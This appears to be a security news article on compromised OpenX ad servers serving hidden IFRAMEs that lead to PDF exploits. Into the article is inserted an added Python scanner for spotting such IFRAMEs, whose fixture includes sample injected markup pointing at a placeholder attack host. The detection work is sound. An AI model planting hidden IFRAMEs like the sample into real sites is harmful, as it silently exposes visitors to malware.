Malware, Vulnerability Management

Vulnerable ad servers exploited to compromise sites

Several sites running the OpenX free advertisement server were compromised this week, leading to a tenfold increase in malicious PDF exploit attempts detected by researchers at web security firm Blue Coat.

All but one of the compromised sites were using an outdated and vulnerable version of OpenX, which attackers exploited to host a piece of malicious JavaScript code on the ad server, Tim Van Der Horst, malware engineer at Blue Coat, told SCMagazineUS.com on Friday.

The malicious JavaScript creates an invisible IFRAME, which opens a background connection to an attack site that silently tries to infect users with a variety of exploits, including ones against Adobe Reader. Affected sites include a Nigerian news outlet and others pertaining to Filipino boxing, HTML tutorials, Venezuelan sports and Italian iPhones.
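The injection pattern described above (an invisible IFRAME pulling in an external attack site) is something a site operator can check for in the markup an ad server actually returns. The following is an added example, not code from the article or from OpenX or Blue Coat: a small Python scanner that parses a served ad response and flags IFRAMEs that are both hidden (zero size, `display:none`, `visibility:hidden`, or pushed far off-screen) and sourced from a host outside an allow-list. The sample markup and all host names in it are constructed for the example; `ads.example-publisher.test` and `attack-site.invalid` are placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of what a compromised ad slot might return.
# Hosts are placeholders (reserved .test / .invalid TLDs), not real sites.
SAMPLE_AD_RESPONSE = """
<div class="ad-slot">
  <a href="http://ads.example-publisher.test/click?id=42">
    <img src="http://ads.example-publisher.test/banner.gif">
  </a>
</div>
<iframe src="http://attack-site.invalid/load.php" width="0" height="0" style="visibility:hidden"></iframe>
<iframe src="http://ads.example-publisher.test/rich-media.html" width="300" height="250"></iframe>
<iframe src="http://attack-site.invalid/x" style="position:absolute;left:-9999px"></iframe>
"""


class IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def _is_zero(value):
    """True when a width/height attribute resolves to 0 (e.g. "0" or "0px")."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) == 0


def is_hidden(attrs):
    """Heuristics for an IFRAME the user is never meant to see."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    if _is_zero(attrs.get("width")) or _is_zero(attrs.get("height")):
        return True
    # Positioned hundreds of pixels or more off-screen.
    if re.search(r"(left|top):-\d{3,}px", style):
        return True
    return False


def find_hidden_foreign_iframes(html, trusted_hosts):
    """Return src URLs of hidden IFRAMEs whose host is not in trusted_hosts.

    Relative sources (no host) are skipped; the check targets the
    background connection to a third-party attack site.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname or ""
        if host and host not in trusted_hosts and is_hidden(attrs):
            findings.append(src)
    return findings


if __name__ == "__main__":
    for src in find_hidden_foreign_iframes(SAMPLE_AD_RESPONSE, {"ads.example-publisher.test"}):
        print("hidden foreign iframe:", src)
```

Running this over the sample reports the two `attack-site.invalid` frames and ignores the visible, first-party rich-media frame. Run against live ad-server responses (or the files under the ad server's web root) it also catches the situation the article describes later, where injected code survives a version upgrade because the upgrade never removed it. The heuristics are deliberately conservative: a script that builds the IFRAME at runtime via `document.write` would not be caught by a static parse, so the output is a starting point for review, not a verdict.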

“Looking through yesterday's logs, there were 12 sites compromised this way,” Van Der Horst said.

OpenX announced in December that a remote vulnerability exists in version 2.8.2 of its software and provided an update to fix the issue. All affected sites except the Italian iPhone site were running this vulnerable version, Blue Coat researchers said.

They believe the Italian iPhone site, which currently runs the latest version of OpenX, was likely compromised while on a previous version and that the attacker's code was not cleaned up during the update process. Another scenario is that there is a new, undiscovered vulnerability in OpenX 2.8.5, the latest version of the ad server.

A spokesperson for OpenX did not respond to a request for comment made by SCMagazineUS.com on Friday.

The malicious PDFs used in the attacks are detected by most traditional anti-virus scanners, Chris Larsen, senior malware researcher at Blue Coat, told SCMagazineUS.com on Friday. In addition, having an up-to-date version of Adobe Reader should protect users.

The victim sites are likely still infected and will continue to send traffic to the malware network until they're cleaned up by their administrators, Larsen said. A typical website today has many different components, making it hard for webmasters to keep track of everything.
